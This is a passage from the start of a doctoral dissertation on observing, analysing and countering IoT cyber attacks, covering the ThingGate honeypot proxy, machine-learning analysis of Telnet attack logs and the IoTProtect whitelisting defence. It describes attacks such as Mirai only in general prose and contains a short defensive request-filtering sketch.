A Study on Observation, Analysis, and Countermeasure of Cyber Attacks in IoT IoT におけるサイバー攻撃の観測、分析、および対 策に関する研究 By CHUNJUNG WU December, 2019 A doctoral dissertation submitted to the Graduate School of Environment and Information Sciences, Yokohama National University Principal Advisor: Professor Tsutomu MATSUMOTO


A Study on Observation, Analysis, and Countermeasure of

Cyber Attacks in IoT

IoT におけるサイバー攻撃の観測、分析、および対

策に関する研究

By

CHUNJUNG WU

December, 2019

A doctoral dissertation submitted to

the Graduate School of Environment and Information Sciences,

Yokohama National University

Principal Advisor: Professor Tsutomu MATSUMOTO


Acknowledgement

First, I would like to express my deepest appreciation to my principal supervisor, Professor
Tsutomu Matsumoto, who has the attitude and substance of a genius: he constantly and convincingly
conveys the prudence and hard work that research demands. Without his guidance and persistent
help, this dissertation would not have been possible. I am incredibly grateful to Associate
Professor Katsunari Yoshioka, who taught me how to conduct cybersecurity research and write
technical papers. Without his leadership, discussions, and support, I would not have been able to
finish my study. I also gratefully acknowledge Professor Junji Shikata, whose intelligent comments
and advice contributed significantly to my research.

I would like to thank Professor Tatsunori Mori and Lecturer Shinichi Shirakawa for serving
on my dissertation committee. Their valuable comments were extremely constructive. Special
thanks go to Dr. Shin-Ying Huang from the Institute for Information Industry for insightful
discussions and beneficial collaboration, and to Dr. Erwan Le Malecot for his critical
comments and help with the network infrastructure.

I am also indebted to the past and present members of the Matsumoto Laboratory, Shikata
Laboratory, and Yoshioka Laboratory, from whom I learned a lot and received a great deal of help.
I also appreciate the help of the secretaries of the Matsumoto Laboratory and Yoshioka Laboratory:
Ms. Mio Narimatsu, Ms. Tomoko Ishidate, Ms. Kumiko Nakayama, Ms. Kiyono Yoshitani, and
Ms. Emiko Kawamura. Their kindness supported me through to graduation at Yokohama National
University.

Finally, I would like to thank my parents for their support and for giving me the chance to study
at Yokohama National University. I acknowledge everyone who helped me during my campus life.


Abstract

In recent years, cyber attacks in IoT have become increasingly rampant. Mirai botnets executed a
massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. A Kaspersky report
from Sept. 2018 shows that Mirai is still the most popular IoT malware family among
cybercriminals (20.9%). Moreover, IoT malware keeps evolving and exploits multiple
vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families
have assimilated many known exploits affecting Internet of Things (IoT) devices. These exploits
target devices from 11 makers over the HTTP, UPnP, Telnet, and SOAP protocols. Besides malware,
human attackers also use various tools to access devices and collect various information from them.
For instance, the web UIs of IP cameras and routers are constantly searched for and accessed if
vulnerable. Hence, the tools for observing cyber attacks in IoT should be reconsidered and
evaluated. To observe and analyze such a variety of attacks in depth, there is an increasing
need for bare-metal IoT devices as honeypots, since it is costly to emulate device-specific
vulnerabilities and the complex functionalities of dedicated services. However, operating
bare-metal IoT honeypots poses unique technical challenges, mostly stemming from their low
configurability as embedded systems, which brings management and information leak problems.

In chapter 3, we introduce frequent cyber attacks against IoT. We then describe a framework for
the observation, analysis, and countermeasure of cyber attacks in IoT. The first part is a set of
techniques to support a honeypot consisting of physical IoT devices. A bare-metal honeypot needs
proper access control, such as filtering out bricking commands and changes to critical
configuration, while still allowing attackers to access its inside to some degree. The MITM proxy
can control the incoming and outbound traffic of the honeypot, filter out unwanted attack flows,
and prevent information leaks. The second part is a set of techniques for analyzing the massive
data of IoT honeypots. We apply text-mining and machine learning algorithms to find new attack
vectors and categorize known botnets' attacks. The third part is a whitelisting-based
countermeasure against cyber attacks in IoT. Besides introducing the functionality, we show how to
protect the IoT devices in the honeypot from unwanted cyber attacks. We also propose a novel
approach to creating an appropriate view that analyzes the incoming data in depth and uses our
resources efficiently. Finally, we show a method to recognize and remove IoT malware processes by
examining the pathname and binary hash value found in the "/proc" folder.

In chapter 4, we combine the capabilities of a transparent proxy and a web tracking library to
develop ThingGate, a supporting mechanism for honeypots consisting of physical IoT devices.
ThingGate improves the manageability of the honeypot, extends the functionality of web tracking,
and manages the incoming traffic and the outgoing response content in a MITM manner. We evaluate
ThingGate with seven bare-metal IoT devices. The experimental results show that it successfully
blocks unwanted incoming attacks, masks the wireless access point information of the devices, and
tracks attackers on the device web UI, while showing high observability of various attacks
exploiting different vulnerabilities.

A drastic increase in cyber attacks targeting Internet of Things (IoT) devices over the Telnet
protocol has been observed since 2016. A Kaspersky report in Sept. 2018 estimated that Telnet is
still the primary attack vector of cyber attacks in IoT (75%). Therefore, in chapter 5, we propose
a novel method based on malware binaries, command sequences, and meta-features to analyze
22.9 GB of Telnet logs and 5,616 different malware binaries collected by an IoT honeypot over
284 days. We employ both unsupervised and supervised learning algorithms, together with
text-mining algorithms for handling unstructured data. Clustering analysis is applied to find
malware family members and reveal their inherent features for a better explanation. First, the
malware binaries are grouped using similarity analysis. Then, we extract key patterns of
interaction behavior using an N-gram model. We also train a multiclass classifier to identify IoT
malware categories based on common infection behavior. For misclassified subclasses, second-stage
sub-training is performed using a file meta-feature. Our results demonstrate 96.70% accuracy, with
high precision and recall. The results indicate that our method remains valid even for a dataset
spanning nine months. Although command sequences can change many times, trigram features can
accurately distinguish Mirai, Bashlite, and Hajime malware based on differences in their infection
command patterns. The clustering results reveal variant attack vectors and one denial of service
(DoS) attack that used pure Linux commands.

Many Internet-of-Things (IoT) devices, such as home routers and Internet Protocol (IP)
cameras, have been compromised through infection by malware as a consequence of weak
authentication and other vulnerabilities. Malware infection can lead to functional disorders and/or
misuse of these devices in cyber attacks of various kinds. However, unlike personal computers
(PCs), low-cost IoT devices lack rich computational resources, with the result that conventional
protection mechanisms, such as signature-based anti-virus software, cannot be used. In chapter 6,
we present IoTProtect, a lightweight, whitelist-based protection mechanism that can be
deployed easily on existing commercial products with very little modification of their firmware.
IoTProtect periodically checks the processes running on an IoT device against a whitelist and
terminates unknown processes. Our experiments using four low-cost IoT devices and 4,981
in-the-wild malware binaries show that IoTProtect successfully terminated 99.92% of the processes
created by the binaries within 44 seconds after their infection, with a central processing unit
(CPU) overhead of 24% and a disk space overhead of 288 KB.

Table of Contents

Acknowledgement
Abstract
Table of Contents
List of Figures
List of Tables
Chapter 1. Introduction
  1.1. Motivations and Contributions
  1.2. Organization
Chapter 2. Background and related work
  2.1. Internet of Things
  2.2. Cyber attacks in IoT
    2.2.1. Botnets
    2.2.2. Cyber attacks against WebUI of Physical IoT Devices
  2.3. Related works of honeypot consist of physical IoT devices
  2.4. Related works of Malware Analysis through machine learning
  2.5. Related works of countermeasure against cyber attacks in IoT
Chapter 3. Observation, Analysis, and Countermeasure of cyber attacks in IoT
  3.1. Observation of cyber attacks in IoT
  3.2. Analysis of cyber attacks in IoT
  3.3. Countermeasure of cyber attacks in IoT
Chapter 4. ThingGate: A gateway for flexible operation of bare-metal IoT honeypot
  4.1. Introduction
  4.2. Definitions
    4.2.1. Man-in-the-middle
    4.2.2. Transparent Proxy
    4.2.3. Browser fingerprinting
    4.2.4. Cyber attacks against WebUI of Physical IoT Devices
  4.3. ThingGate
    4.3.1. System goal
    4.3.3. System Architecture and Modules
  4.4. Evaluation
    4.4.1. Prototype and dataset
    4.4.2. Cyber attacks against the WebUI of physical IoT devices
    4.4.3. Blocking unwanted flow experiments
    4.4.4. Web tracking experiments
    4.4.5. Managing misplaced attacks experiments
    4.4.6. Fabricated sensor information experiment
    4.4.7. Stress testing against IoT devices
  4.5. Discussion
    4.5.1. Limitations
Chapter 5. IoT Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-Feature Information
  5.1. Introduction
  5.2. Methods
    5.2.1. Preliminaries
    5.2.2. Encoding and measurement of command sequences
    5.2.3. Data analysis
  5.3. Experiments
    5.3.1. Dataset and Environment
    5.3.2. Clustering Experiments
    5.3.3. Classification Experiments
  5.4. Discussion
Chapter 6. IoTProtect: Highly Deployable Whitelist-based Protection for Low-cost Internet-of-Things Devices
  6.1. Introduction
  6.2. Preliminaries
    6.2.1. Linux processes information
    6.2.2. Files in IoT devices
    6.2.3. Major premises of IoTProtect
  6.3. IoTProtect
  6.4. Evaluation
    6.4.1. Data collection and experimental devices
    6.4.2. Removal experiment
    6.4.3. Mitigating outgoing attacks
    6.4.4. Trade-off between security and device performance
    6.4.5. Evaluation of easy deployment
  6.5. Discussion
    6.5.1. Comparison with previous studies
    6.5.2. Limitations
Chapter 7. Conclusion and future works
  7.1. Conclusion
  7.2. Future works
Bibliography
List of Paper
  Reviewed papers in Journals
  Preparing to submit papers in Journals
  Technical Reports
Appendix
  Appendix A
  Appendix B

List of Figures

Fig. 1 Lifecycle of Mirai Botnet [16].
Fig. 2 Flow of studying cyber attacks in IoT.
Fig. 3 System overview of ThingGate
Fig. 4 System Architecture of ThingGate
Fig. 5 The processing flow of Request controller
Fig. 6 The encoded URL of CI-URL and decoded results
Fig. 7 Downloaded Scripts from CI-URL
Fig. 8 The HTTP request of a modifying configuration attack.
Fig. 9 Web Tracking flow of ThingGate
Fig. 10 Country distribution of fingerprinted clients
Fig. 11 Googlebot’s user-agent and the verifying result
Fig. 12 Vulnerability distribution of CI-URL
Fig. 13 Statistic of malware labels
Fig. 14 Fabricated Wi-Fi AP list
Fig. 15 Trigram statistics of Bashlite IoT malware.
Fig. 16 Trigram statistics of Mirai IoT malware.
Fig. 17 Trigram statistics of Satori IoT malware.
Fig. 18 Data analysis flow
Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017
Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017
Fig. 21 Format of the maps [100]
Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200
Fig. 23 Distribution of ASUS RT-AC3200 files
Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect
Fig. 25 Results of experiment on mitigating outgoing attacks
Fig. 26 Experimental environment for measuring the trade-off between performance and security
Fig. 27 Results of experiment measuring trade-off

List of Tables

Table 1 IoT devices used in experiments.
Table 2 Data set for analysis.
Table 3 HTTP method statistics for dataset 2.
Table 4 Statistics of cyber attacks. Observation of 7 months.
Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.
Table 7 Features of the fingerprinted clients.
Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 10 IoT devices used in experiments.
Table 11 Comparison of labels and infection command sequence [4].
Table 12 Top 5 antivirus engines for IoT malware.
Table 13 An example of the command mapping table.
Table 14 Distance measures for different malware labels (average).
Table 15 Distance measures for different malware labels (minimum).
Table 16 Distance measures for different n-gram between Bashlite and Mirai
Table 17 Time cost for different n-gram between Bashlite and Mirai
Table 18 Dataset for analysis.
Table 19 Malware categories and ECTs' distribution.
Table 20 Statistics of time cost.
Table 21 Victims of Fileless DoS.
Table 22 Classification performance of even sampling - Naive Bayes.
Table 23 Classification performance of even sampling - SVM.
Table 24 Classification performance of random sampling - Naive Bayes.
Table 25 Classification performance of random sampling - SVM.
Table 26 Precision/recall of SVM – second stage (reinforcement learning).
Table 27 Commercial secure software against embedded systems.
Table 28 Table of symbols.
Table 29 IoT devices used in conducting the experiments.
Table 30 IoT malware used for conducting the experiments.
Table 31 Results of the removal experiments.
Table 32 IoTProtect overheads.
Table 33 Cost of creating whitelists.


Chapter 1.

Introduction

1.1. Motivations and Contributions

Over the past years, people have been connecting various things to the internet for monitoring,
collecting data, or remote manipulation. Backend applications collect and exchange data with
these devices through the network. A network of this kind is called the Internet of Things
(IoT). Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is
projected to grow to 20.8 billion by 2020 [1]. Most IoT devices, however, use simple, low-end
hardware and lack antivirus and monitoring services. Moreover, many users are not aware of the
need to change the default credentials of admin accounts.

In Oct. 2016, the IoT malware “Mirai” used a list of default credentials to log in to IoT devices
and obtain root privileges. It then downloaded malware binaries and conducted further infections
and DDoS attacks. As a result, Mirai conducted a massive Distributed Denial of Service (DDoS)
attack against Dyn DNS. About 100,000 Mirai IoT botnet nodes were enlisted in this incident,
and reported attack rates were up to 1.2 Tbps [2]. Cyber threats from IoT botnets have therefore
become a reality.

Further, IoT malware keeps evolving and exploits multiple vulnerabilities to infect IoT devices.
Since May 2018, the Mirai and Gafgyt malware families have assimilated multiple known exploits
affecting Internet of Things (IoT) devices. These exploits target devices from 11 makers over the
HTTP, UPnP, Telnet, and SOAP protocols [3]. Besides DDoS attacks, new IoT malware has
diverse purposes, including coin mining, click fraud, and sending spam emails. In addition,
human attackers also use various tools to access devices and collect various information from them.
For example, the WebUIs of many IP cameras and routers are constantly searched for and accessed
if vulnerable.

To observe cyber attacks against IoT devices and analyze the threats from IoT malware,
researchers have designed new observation mechanisms and built various honeypots. These honeypots
include, for example, IoTPOT [4], SIPHON [5], IoTCandyJar [6], and a real-device honeypot for
observing the Web UI of IoT devices [7]. These honeypots successfully observed various cyber
attacks in IoT. However, some human-like attackers modify the configuration in ways that impair
the effectiveness of the honeypot, such as changing network settings and updating the firmware.
Besides, the tremendous flow of cyber attacks in IoT creates an urgent need for a method that
analyzes the massive incoming data in depth and uses resources efficiently. Moreover, we want
to find a countermeasure against cyber attacks in IoT.

Based on the honeypot methodology and the attack campaigns of IoT malware, this dissertation
proposes three methods for the observation, analysis, and countermeasure of cyber attacks in
IoT. The first method provides a control and protection mechanism for a bare-metal IoT honeypot,
namely, a real IoT device used as a honeypot. Real devices are used because it is costly to
emulate device-specific vulnerabilities and the complicated functionalities provided through
their WebUI and other dedicated services, such as UPnP.

The first method focuses on managing the incoming traffic and response information of the
bare-metal IoT honeypot. We propose ThingGate, a customized proxy placed transparently between
the honeypot and the internet. ThingGate filters out unwanted HTTP requests, such as
deadly attack vectors and critical configuration changes. Moreover, it prevents the
leakage or exposure of sensitive information and injects fingerprinting JavaScript code in
a man-in-the-middle (MITM) manner to track user clients. As the honeypot, we use physical IoT
devices that are known to have been targeted by IoT malware. We cannot claim that the
honeypot catches all attacks in IoT, as we have only a limited number of devices. Some IoT
malware does not check the targeted device before sending malicious HTTP requests. For such
misplaced attack vectors, which target IoT devices that are not among our physical devices, the
proxy redirects them to the analysis module for further real-time analysis. With this approach,
during 7 months of operation, ThingGate successfully blocked one critical configuration change
attack. In addition, we collected 26 client fingerprints from 18 different source IPs. ThingGate
also sent fabricated Wi-Fi information to 44 different clients who accessed the Wi-Fi web page,
and analyzed 411 misplaced HTTP requests, which contained 50 different URLs that exploited seven
vulnerabilities. Moreover, ThingGate successfully collected 150 different malware binaries and
23 scripts.
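The three-way handling of incoming requests described above (block, forward to the physical device, or redirect to the analysis module) can be illustrated with a minimal sketch. This is not ThingGate's implementation: the function name, the `Decision` type, and every path in the two rule sets are hypothetical placeholders chosen for illustration, and a real deployment would derive its rules from the specific devices in the honeypot.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hypothetical rule sets (assumptions, not taken from the dissertation):
# paths whose requests would change critical configuration, and paths that
# the physical devices behind the proxy actually serve.
BLOCKED_PATHS = {"/cgi-bin/firmware_upgrade.cgi", "/cgi-bin/set_network.cgi"}
KNOWN_PATHS = {"/", "/index.html", "/cgi-bin/wifi_scan.cgi"}


@dataclass(frozen=True)
class Decision:
    action: str  # "block", "forward", or "analyze"
    reason: str


def classify_request(url: str) -> Decision:
    """Decide how a proxy in front of the honeypot might treat one request."""
    # Only the path is compared; the query string and host are ignored here.
    path = urlsplit(url).path or "/"
    if path in BLOCKED_PATHS:
        return Decision("block", "critical configuration change")
    if path in KNOWN_PATHS:
        return Decision("forward", "served by a physical device")
    # Anything else is treated as a misplaced attack aimed at another device.
    return Decision("analyze", "misplaced request")


if __name__ == "__main__":
    for url in ("/cgi-bin/set_network.cgi?ip=10.0.0.9", "/index.html", "/HNAP1/"):
        print(url, "->", classify_request(url).action)
```

Matching on exact paths keeps the sketch short; pattern-based rules or per-device rule sets would be a natural extension under the same structure.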

The second method focuses on applying machine learning techniques to analyze the observed

data from IoT honeypots. According to the report from Kaspersky in Sept. 2018, the most popular

attack and infection vector against devices remains the telnet service (75.4%) [8]. Thus the second

method targets the Telnet logs of the IoT honeypot. The method determines categories of malware

by analyzing its meta-features and command sequences. We extracted 2.7 million critical Telnet

logs from 22.9 GB Telnet log files. This approach mapped logs' commands to a smaller dataset

and performed classification and clustering analysis. Its contributions are summarized as follows:

1. We showed that similar IoT malware binaries issue similar infection commands. Moreover,

through similarity analysis of command sequences, we can identify the malware category of

unknown threats.

2. By clustering Telnet logs, we discovered a new DoS cyber attack executed using pure Linux

commands, without IoT malware binaries.

3. Evaluated on 5,516 malware samples from the IoT honeypot, our proposed method could

identify four major malware categories with 96.70% accuracy.

The third method, IoTProtect, is a whitelisting method for protecting low-cost IoT devices. This method

checks the MD5 hash values of binaries and the pathnames of user-space processes, and then

removes the processes that are not in the whitelists. We implemented a shell script prototype and

showed that it could be executed successfully on low-cost IoT devices, such as Wi-Fi routers and

storage, with marginal cost. We tested 4,981 different IoT malware binaries on four

different bare-metal IoT devices, and IoTProtect removed 99.92% of these malicious processes

successfully. IoTProtect is easy to deploy on existing IoT devices. The

installation procedure for the IoTProtect checker is very light and quick. The checker program is

written using Bash scripts, leading to portability between different Linux distributions. Moreover,

the checker program is only 1.5 KB in size, which allows quick deployment on low-cost IoT

devices.

1.2. Organization

The rest of this dissertation is organized as follows. Chapter 2 presents the background and

related works. Chapter 3 describes the observation, analysis, and countermeasure of cyber attacks

in IoT; the methodology is based on an IoT honeypot consisting of physical IoT devices. Chapter 4

details the implementation of a protection and management mechanism for the IoT honeypot. This

approach focuses on protecting the WebUI of physical IoT devices from information leaks, unwanted requests,

and bricking attacks. Chapter 5 discusses a novel analysis method for the massive Telnet attack

vector logs that creates an in-depth view of cyber attacks in IoT. Chapter 6 discusses an IoT malware

removal method for light-weight devices based on whitelisting. The dissertation concludes

with Chapter 7.

Chapter 2.

Background and related work

2.1. Internet of Things

The concept of a network of smart devices was discussed as early as 1982, when a modified

Coke vending machine at Carnegie Mellon University became the first Internet-connected

appliance, able to report its inventory and whether newly loaded drinks were cold or not [9].

In 1994, Reza Raji [10] described the concept in IEEE Spectrum as “moving small packets of

data to a large set of nodes, to integrate and automate everything from home appliances to entire

factories.”

The term “Internet of things” was likely coined by Kevin Ashton of MIT’s Auto-ID Center, in

1999, though he prefers the phrase “Internet for things.” At that point, he viewed Radio-frequency

identification (RFID) as essential to the Internet of things [11]. Huvio, Grönvall, and

Främling proposed an information system infrastructure for implementing smart, connected

objects, mentioning the Internet of Things in a sense that more closely matches the modern IoT meaning

[12].

According to the Cisco Internet Business Solutions Group (IBSG), the IoT emerged at the point in time when

more “things or objects” were connected to the Internet than people. Cisco Systems estimated that

the IoT was “born” between 2008 and 2009, with the things/people ratio growing from 0.08 in

2003 to 1.84 in 2010 [13].

2.2. Cyber attacks in IoT

2.2.1. Botnets

A Botnet is a collection of Internet-connected devices, each of which runs one or more bots. Bots

are agent programs on compromised host machines that maintain access so that attackers can control

them. Typically, a bot, once installed on a victim machine, establishes outbound connections to a

C&C server. Botnets can be used to perform distributed denial-of-service (DDoS) attacks,

steal data, send spam, and allow the attacker to access the device and its connection. The

botmaster can control the Botnet using command and control (C&C) software [14].

Other Botnet malware families, such as Bashlite [15], targeted IoT devices before Mirai.

However, Mirai was the first IoT Botnet to emerge as a high-profile DDoS threat. In

2016, Mirai Botnet infected nearly 65,000 IoT devices in its first 20 hours before reaching a steady

state population of 200,000–300,000 infections [16]. Hence, we introduce the Mirai Botnet to

explain the Botnet attack campaign against IoT.

Fig. 1 shows the lifecycle of Mirai. In phase 1, Mirai asynchronously and "statelessly"

sends TCP SYN probes to pseudorandom IPv4 addresses, excluding those in a hard-coded IP

blacklist, on Telnet TCP ports 23 and 2323. If Mirai identifies a potential victim, it enters a

brute-force login phase in which it attempts to establish a Telnet connection using credentials selected randomly

from a pre-configured list of 62 credentials. At the first successful login, Mirai sends the victim IP

and associated credentials to a hard-coded report server in phase 2. The report server dispatches the victim

information to a loader in phase 3. The separate loader program infects these vulnerable devices

by downloading and executing architecture-specific malware in phase 4. With the operations from

phase 1 to phase 4, Mirai builds the IoT Botnet. When the attacker wants to launch a DDoS

attack, the attacker sends commands to the C&C server in phase 5. The C&C server then relays the

commands to the bots on the infected devices in phase 6. Finally, these victim devices generate DDoS

traffic and attack the DDoS target in phase 7 [16].

Fig. 1 Lifecycle of Mirai Botnet [16].

2.2.2. Cyber attacks against WebUI of Physical IoT Devices

In 2017, Ezawa et al. [7] proposed a honeypot consisting of physical IoT devices to observe

cyber attacks against the WebUI of IoT devices. In 2018, Tamiya et al. [17] employed five IP

Cameras to build a decoy honeypot to capture the behavior of peeping attackers. Based on

their observations, we summarize four kinds of cyber attacks against the WebUI of these devices:

1. Configuration information theft attacks

If the device has information disclosure vulnerabilities or weak credentials, the

attacker can collect the configuration and parameters of the device through URLs such as

get_status.cgi.

2. Modification of the configuration

Attackers may modify the DDNS, VPN, credentials, and network configuration, which

impacts the effectiveness of the honeypot.

3. Snapshot attacks

Snapshot is a feature of IP Cameras that offers users a current image of the live stream.

Once a client sends the HTTP request for the snapshot, the web server

provides the current image as a JPG or PNG file.

4. Long term peeping

This attack is observed by IP Cameras when clients access the URL of the live stream

and stay on the web page of the live stream for several hours.

2.3. Related works of honeypots consisting of physical IoT devices

To observe cyber attacks in IoT, researchers develop new tools and platforms for

monitoring. In [5], Guarnizo et al. proposed the SIPHON architecture, which is a scalable

high-interaction honeypot platform for IoT devices. Their architecture leverages IoT devices physically

present at one location and connected to the Internet through so-called wormholes distributed

worldwide. The resulting architecture allows the exposure of a few physical devices over

numerous geographically distributed IP addresses.

Many embedded devices have WebUI for device management and operation, and some of them

are open to the Internet with vulnerabilities and weak credentials. Ezawa et al. [7] proposed the use

of a honeypot to monitor attacks against the WebUI of IoT devices by employing bare-metal

devices. The observation results contained attacks against regular web servers and indicated that

some attacks are automatically conducted through certain tools or types of malware. The

observation also suggests that some attackers changed the DDNS, VPN, and network settings,

resulting in the device becoming unavailable for other attackers.

Tamiya et al. [17] employed a decoy honeypot consisting of five IP Cameras to capture the

behavior of human-like attackers. Their research shows behaviors including extracting

environment parameters of devices, downloading snapshots of live streams, and long-term

peeping at live streams.

Compared with the existing literature, we find that previous honeypots built from physical IoT devices lack

protection against sensitive information leaks and dangerous commands. Our work focuses on the

high-interaction honeypot consisting of physical IoT devices. Our approach improves the security

of the honeypot, including protecting sensitive data collected by sensors. Besides, our program

monitors and manages the incoming traffic to avoid dangerous commands. Moreover, we

extended the web tracking function to the WebUI of physical devices. Further, our setup allows us to

capture and analyze some misplaced attacks across different remote code execution vulnerabilities

in real-time.

2.4. Related works of Malware Analysis through machine learning

IoT Botnets have generated massive attack traffic against IoT devices all over the world, including

IoT honeypots. IoT honeypots such as IoTPOT collected 124 million attack

vector logs over the Telnet protocol and 40,000 different malware binaries between 2015 and 2017.

To analyze the data in depth and efficiently, we review the literature on malware analysis

through machine learning. Yen et al. (2013) conducted an epidemiological study of malware

encountered in a large, multinational enterprise. They collected security and network

infrastructure logs to determine the key behavioral features of web-based malware. Moreover,

they used a logistic regression model to identify and rank the malware risk [18]. Masud, Khan,

and Thuraisingham presented a method of detecting malicious executables that combined three

types of features: binary N-grams, assembly instruction sequences, and dynamic-link library

function calls [19].

In 2015, Microsoft and Kaggle held the Malware Classification Challenge (BIG 2015), in

which Microsoft provided 20,000 Windows malware binary and assembler code files, with nine

categories of malware. Contestants had to classify the malware categories as well as possible. The

winning team extracted different features from the ASM file opcode and gathered pixel data from

malware disk images, then applied an N-gram algorithm to predict the malware category, thereby

achieving 99.7% accuracy. Ahmadi et al. subsequently used similar features to improve the

classification algorithm and achieve 99.8% accuracy with lower computational costs [20].

Drew, Moore, and Hahsler applied the Strand gene sequence classifier, which offers a robust

classification strategy that easily accommodates unstructured data, to malware classification.

Their method was used on approximately 500 GB of data to predict nine polymorphic malware

categories, and the results indicated that, with minimal adaptations, it achieved an accuracy of

well over 95% [21]. Most research has analyzed Windows-based malware and devised

experiments in MS Windows platforms.

For Linux/Unix malware, Shahzad and Farooq analyzed 709 Linux executable and linkable

format (ELF) files, extracting features from the ELF header and then applying machine-learning

classifiers to detect malware. Their method achieved 99% detection accuracy, with a false alarm

rate of less than 0.1% [22]. Bai et al. gathered features from ELF file system calls and tested four

classification algorithms (J48, Random Forests, AdaBoostM1, and IBk) for detecting Linux

malware, achieving a detection accuracy of approximately 98% [23].

Given that serious worm attacks have occurred through the Internet, Wang et al. proposed a

worm detection method based on mining dynamic program executions. They analyzed system

calls from MS Windows and Linux and traced system call sequences using a natural language

processing algorithm. They also applied the machine-learning algorithms Naive Bayes and

Support Vector Machines (SVM), with SVM achieving a 99.5% worm detection rate and a 2.22%

false positive rate [24].

For Android malware, Ham et al. [25] extracted features about the network, phone, message,

CPU, battery, and memory for each process in Android devices. They applied a linear SVM to

detect Android malware and compared the malware detection performance of the SVM with that of

other machine learning classifiers. They showed that the SVM outperforms the other machine learning

classifiers, with an accuracy of 0.995 and a precision of 0.957.

Azmoodeh, Dehghantanha, and Choo [26] presented a deep learning based method to detect

Internet of Battlefield Things (IoBT) malware via the device’s Operational Code (OpCode)

sequence. They transmuted OpCodes into a vector space and applied a deep Eigenspace learning

approach to classify malicious and benign applications. Their method could achieve 99.68%

accuracy and 98.37% recall.

Su et al. [27] proposed a novel lightweight method of detecting DDoS malware in IoT

environments. First, one-channel grayscale images converted from binaries were extracted, and

then a lightweight convolutional neural network was used to classify IoT malware families. The

experimental results indicated that this system could achieve 94.0% accuracy in goodware and

DDoS malware classification and 81.8% accuracy in classification of goodware and the two main

malware families.

Our study examined Linux malware. Its major difference from other research lay in the dataset.

We primarily analyzed shell commands from IoT malware, also examining the file meta-

information when necessary.

2.5. Related works of countermeasure against cyber attacks in IoT

The attack campaign of the Mirai Botnet shows that there is an urgent need to

develop a countermeasure for cyber attacks in IoT. Moreover, the countermeasure should be

applicable to light-weight IoT devices. In this section, we review the research on whitelisting

solutions for detecting malware.

Pareek, Romana, and Eswari consider that blacklisting-based solutions for detecting malware

suffer from problems of false positives and negatives. They share the idea of application

whitelisting that has been applied by security vendors and various other solutions. They also

provide details regarding design and implementation approaches and discuss challenges to

developing an effective whitelisting solution [28].

Obermeier, Schierholz, and Hristova apply whitelisting to applications for protecting industrial

automation and control systems. They find application whitelisting to be an effective means of

preventing the installation of malware [29]. Bhardwaj et al. developed a process monitoring

system based on blacklisting and whitelisting of process names [30]. Further, they developed an

application called “Debsums” to calculate the MD5 sums of an installed package and compare

them with those from existing processes [31]. However, an adversary can easily alter process

names and thus evade detection.

Paleari et al. present an architecture for automatic generation of procedures for recovery from

malicious programs. This method extracts the behavior of applications and monitors system calls

using QEMU, an emulator and monitor of virtual machines. In addition, they propose clustering

the behavior of malware to construct recovery procedures [32].

In 2011, Shahzad et al. proposed a classification-based method that analyzes a minimal feature

set of 11 features for distinguishing benign and malicious processes. This method provides 93%

detection accuracy with a 0% false alarm rate within 100 milliseconds [33].

In 2017, Tamiya et al. proposed a method for disinfecting IoT devices by merely rebooting or

resetting the infected devices [34]. Their experiments show that 45 existing IoT malware could

be erased by the simple operation of rebooting, but they did not present a detection method for

these malware binaries.

Koike et al. developed a whitelisting-based execution control technique called “WhiteEgret”

for the Linux operating system (OS). This module uses the bprm_check_security hook and the

mmap_file hook to monitor the absolute path of executable files. WhiteEgret permits execution

if the absolute path is contained in the whitelist and the hash value of the executable file is also

contained in the hash value whitelist [35].

As shown in the above literature review, there is no existing research on IoT cybersecurity

conducted on low-cost devices together with a process-level defense mechanism other than [35].

Moreover, all of the existing technologies require substantial modification of firmware and incur

a significant engineering cost if deployed on existing products. We propose a protection method

that is very light-weight and easy to deploy on existing low-cost IoT devices.

Chapter 3.

Observation, Analysis, and Countermeasure of cyber attacks

in IoT

This dissertation studies cyber attacks in IoT. The research has three phases, and we

propose one novel method in each phase. These three methods have no

dependencies on each other and can be utilized individually. For research on cyber attacks, observation is the

first cornerstone. Many studies apply honeypots to observe cyber attacks in IoT. Some

of them choose virtual machines to emulate IoT devices. However, Cozzi et al. [36]

analyzed 10,548 Linux malware binaries collected between Nov. 2016 and Nov. 2017.

They found that 19 samples detect sandboxes and 259 samples conduct process enumeration.

Therefore, some IoT malware may in the future evade IoT honeypots that consist of virtual machines.

Besides, some cyber attacks, such as the long-term peeping attack, target physical IoT devices in ways that are hard to emulate

with a virtual machine. As a result, our method focuses on physical

IoT devices. We build the honeypot from physical IoT devices and develop a proxy to solve the

problems from WebUI of physical IoT devices.

The next phase of research is to analyze the observation results in depth. We propose a novel

analysis process that utilizes machine learning techniques to analyze the attack data collected by

the IoT honeypot consisting of physical IoT devices. The last phase is to develop a

countermeasure against cyber attacks in IoT. Based on the patterns and findings from the analysis,

we propose IoTProtect, a countermeasure against IoT Botnets, and evaluate the approach with IoT

malware on physical IoT devices. Fig. 2 shows the mapping between the flow of research and our

methods. Considering the different goals we want to achieve, we introduce these three

approaches in section 3.1, section 3.2, and section 3.3.

Fig. 2 Flow of studying cyber attacks in IoT.

3.1. Observation of cyber attacks in IoT

Applying physical IoT devices for building honeypots brings the following challenges:

1. The resources of IoT devices are limited, and installing additional libraries may require modifying the

firmware.

2. The reset or recovery process needs some manual operation on the devices. Many IoT devices

place the reset button on the control panel, and users have to press the button for a while to

trigger the reset function.

3. Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents

devices from working again even with a factory reset. Moreover, some vulnerabilities, such

as CVE-2017-17020, may cause a service shutdown. These types of attack vectors require

human resources for maintenance [38].

4. For analyzing attack vectors against IoT devices, purchasing every kind of physical IoT device to

build a honeypot is not affordable. We can only utilize a limited number of devices in a

honeypot. If a device's weakness does not fit the incoming attack vector, the attack fails and

